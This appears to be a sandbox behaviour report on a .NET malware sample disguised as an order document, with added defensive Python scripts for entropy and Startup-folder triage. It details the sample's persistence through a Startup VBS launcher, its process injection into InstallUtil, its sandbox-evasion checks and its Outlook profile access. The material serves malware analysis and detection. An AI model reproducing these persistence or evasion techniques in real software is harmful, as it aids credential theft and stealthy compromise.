Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Sections loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, edputil.dll
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: NEW FRANCE ORDER.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NEW FRANCE ORDER.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: NEW FRANCE ORDER.exe Static file information: File size 1226752 > 1048576
Source: NEW FRANCE ORDER.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12ae00
Source: NEW FRANCE ORDER.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003F7C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003F7C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: NEW FRANCE ORDER.exe, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[]) (2 entries)
Source: IsSingleByte.exe.0.dr, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[]) (2 entries)
Source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[]) (2 entries)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod (2 entries)
Source: 0.2.NEW FRANCE ORDER.exe.66c0000.10.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.NEW FRANCE ORDER.exe.467e250.2.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.6540000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.6540000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1301642824.0000000006540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06473083 pushfd ; retf 0_2_06473085
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06472F83 push esp; retf 0_2_06472F85
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ADE91 pushad ; iretd 0_2_064ADE95
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064AF441 push es; ret 0_2_064AF450
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ABC01 push es; iretd 0_2_064ABC24
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ABB7D push es; iretd 0_2_064ABBB4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A5308 push E8FFFFFCh; iretd 0_2_064A530D
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ABBDD push es; iretd 0_2_064ABBB4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064ACBEC push esi; retf 0013h 0_2_064ACBEF
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A70CD push es; ret 0_2_064A70D0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A10F8 push edi; retf 0_2_064A1116
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064A092C push es; ret 0_2_064A0978
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_064AD9D2 push es; ret 0_2_064AD9E4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E5E6D push es; ret 0_2_065E5E74
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E6F6D push es; retf 0_2_065E6F70
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E5C92 push es; retf 0_2_065E5CB0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065E35ED push ebx; retf 0_2_065E35F4
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065EC98A push ebp; ret 0_2_065EC991
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065F62C7 push es; iretd 0_2_065F62D0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_065F98A8 push es; iretd 0_2_065F98B0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0660A670 push es; ret 0_2_0660A680
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06663666 push eax; iretd 0_2_06663667
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666B23E push edi; retf 006Ch 0_2_0666B23F
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_0666D2E0 push es; ret 0_2_0666D390
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06973DF6 push ss; ret 0_2_06973DFD
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 0_2_06976507 push ecx; iretd 0_2_0697650C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 7_2_01506EC2 push es; ret 7_2_01506ED0
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0590AD70 pushfd ; iretd 10_2_0590AD7D
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_0590BF28 pushad ; ret 10_2_0590BF35
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FB2F88 pushfd ; retf 10_2_05FB3085
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 10_2_05FB2F86 pushfd ; retf 10_2_05FB3085
Source: NEW FRANCE ORDER.exe Static PE information: section name: .text entropy: 7.927442113182449
Source: IsSingleByte.exe.0.dr Static PE information: section name: .text entropy: 7.927442113182449
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File created: C:\Users\user\AppData\Roaming\IsSingleByte.exe
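
The two entropy lines above are the report's static packing heuristic: a .text section at 7.93 bits per byte (8.0 is the ceiling) holds compressed or encrypted data rather than compiled code, and the identical figure for the dropped IsSingleByte.exe is consistent with it being a byte-for-byte copy of the submitted sample. The script below is an added example, not part of the Joe Sandbox report, that reproduces the measurement with a minimal PE section-table parser and Shannon entropy using only the standard library. The 7.2 flag threshold and the synthetic PE fixture built in demo() are assumptions made for the example; the real sample is not reproduced here.

```python
import math
import random
import struct
from collections import Counter

PACKED_THRESHOLD = 7.2  # assumed triage threshold; compiled x86 or .NET code usually sits well below 7


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte: 0.0 (constant) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(pe: bytes):
    """Minimal PE section-table walk: yields (name, raw_bytes) per section, PE32 and PE32+ alike."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF file header follows the signature: NumberOfSections at +6, SizeOfOptionalHeader at +20
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_opt
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), pe[raw_ptr:raw_ptr + raw_size]


def section_report(pe: bytes, threshold: float = PACKED_THRESHOLD):
    """Return [(section name, entropy, flagged)] in file order, mirroring the report's static check."""
    out = []
    for name, data in pe_sections(pe):
        ent = shannon_entropy(data)
        out.append((name, round(ent, 6), ent >= threshold))
    return out


def build_synthetic_pe(sections):
    """Constructed fixture: a structurally valid PE32 (not runnable) carrying the given (name, bytes) sections."""
    e_lfanew, size_opt = 0x40, 0xE0
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    opt = struct.pack("<H", 0x10B).ljust(size_opt, b"\0")  # PE32 magic, remaining fields zeroed
    ptr = e_lfanew + 24 + size_opt + 40 * len(sections)     # raw data starts right after the table
    table, blobs = b"", b""
    for i, (name, data) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), 0x1000 * (i + 1), len(data), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data
        ptr += len(data)
    return dos + coff + opt + table + blobs


def demo():
    """Three constructed sections: packed-looking, plain strings, and a constant block."""
    rng = random.Random(1650501)  # seeded so the fixture is reproducible
    packed = bytes(rng.getrandbits(8) for _ in range(64 * 1024))
    strings = b"Microsoft.VisualBasic.CompilerServices;System.Windows.Forms;" * 128
    padding = b"\0" * 4096
    pe = build_synthetic_pe([(".text", packed), (".rdata", strings), (".rsrc", padding)])
    return section_report(pe)


if __name__ == "__main__":
    for name, ent, flagged in demo():
        print(f"{name:<8} entropy={ent:.6f} {'PACKED?' if flagged else 'ok'}")
```

Run it against the real sample by replacing demo() with section_report(open(path, "rb").read()); a .text section scoring above the threshold, as here, means the decompiler will see an unpacker stub and the actual keylogger code only exists in memory after it runs.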

Boot Survival

Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsSingleByte.vbs (3 occurrences)
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information set: NOOPENFILEERRORBOX (37 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX (61 occurrences)
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Process information set: NOOPENFILEERRORBOX (36 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX (59 further occurrences)
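
The Boot Survival findings above come down to one persistence mechanism: a .vbs launcher in the per-user Startup folder that starts the copy the sample wrote to %APPDATA%\IsSingleByte.exe, so the payload runs at every logon without touching a Run key or a scheduled task. The NOOPENFILEERRORBOX entries correspond to SetErrorMode(SEM_NOOPENFILEERRORBOX) calls, which suppress the missing-file dialog; .NET processes set this routinely, so on their own they add little. The Python triage script below is an added example and not part of the report: it enumerates script-type launchers in a Startup folder and pulls out the .exe paths they reference, flagging any that point into a user-writable profile directory. The list of launcher extensions, the regex for quoted .exe paths, and the VBS body written by run_demo() are assumptions; the report does not show the real contents of IsSingleByte.vbs.

```python
import os
import re
import tempfile
from pathlib import Path

# Script types the shell will execute straight from the Startup folder (assumed list, extend as needed)
LAUNCHER_SUFFIXES = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd", ".ps1", ".lnk", ".hta"}
# A quoted path ending in .exe, as handed to WScript.Shell.Run / Exec by a dropper script (assumed pattern)
EXE_REF = re.compile(r'"([^"]+\.exe)"', re.IGNORECASE)
# Directories an unprivileged user can write to; a launcher pointing here is the pattern in this report
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\")


def user_startup_dir() -> Path:
    """Per-user Startup folder, the location the report shows IsSingleByte.vbs being written to."""
    return Path(os.environ.get("APPDATA", "")) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"


def triage_startup(folder: Path):
    """Return one dict per script-type launcher found in `folder`, with any .exe paths it references."""
    findings = []
    if not folder.is_dir():
        return findings
    for p in sorted(folder.iterdir()):
        if not p.is_file() or p.suffix.lower() not in LAUNCHER_SUFFIXES:
            continue
        try:
            body = p.read_text(errors="replace")
        except OSError:
            body = ""
        targets = EXE_REF.findall(body)
        findings.append({
            "file": p.name,
            "size": p.stat().st_size,
            "targets": targets,
            "user_writable_target": any(m in t.lower() for t in targets for m in USER_WRITABLE_MARKERS),
        })
    return findings


def run_demo():
    """Constructed fixture: a Startup folder holding a VBS launcher shaped like the one this sample drops.
    The script body is invented for the demo; the report does not reproduce the real IsSingleByte.vbs."""
    root = Path(tempfile.mkdtemp(prefix="startup-triage-"))
    (root / "IsSingleByte.vbs").write_text(
        'Set sh = CreateObject("WScript.Shell")\r\n'
        'sh.Run """C:\\Users\\user\\AppData\\Roaming\\IsSingleByte.exe""", 0, False\r\n'
    )
    (root / "desktop.ini").write_text("[.ShellClassInfo]\r\n")  # benign noise that must be ignored
    return triage_startup(root)


if __name__ == "__main__":
    results = triage_startup(user_startup_dir()) if os.name == "nt" else run_demo()
    for f in results:
        flag = "SUSPICIOUS" if f["user_writable_target"] else "review"
        print(f"{flag}: {f['file']} ({f['size']} bytes) -> {f['targets'] or 'no .exe reference'}")
```

On a live host run it as the affected user (the Startup folder is per profile), and treat any launcher whose target lives under AppData as a hit worth pulling together with the target binary; the all-users folder under ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp is worth the same pass.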

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: NEW FRANCE ORDER.exe, 00000000.00000002.1290556972.0000000003401000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory allocated: 1680000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory allocated: 3400000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory allocated: 3310000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1980000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3260000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 5260000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory allocated: 14A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory allocated: 2ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory allocated: 14E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1500000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2F80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D10000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597852
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596226
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595575
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599653 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599527 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598920 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598266 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597937 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596821 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596719 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596574 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596088 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595818 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595469 Jump to behavior
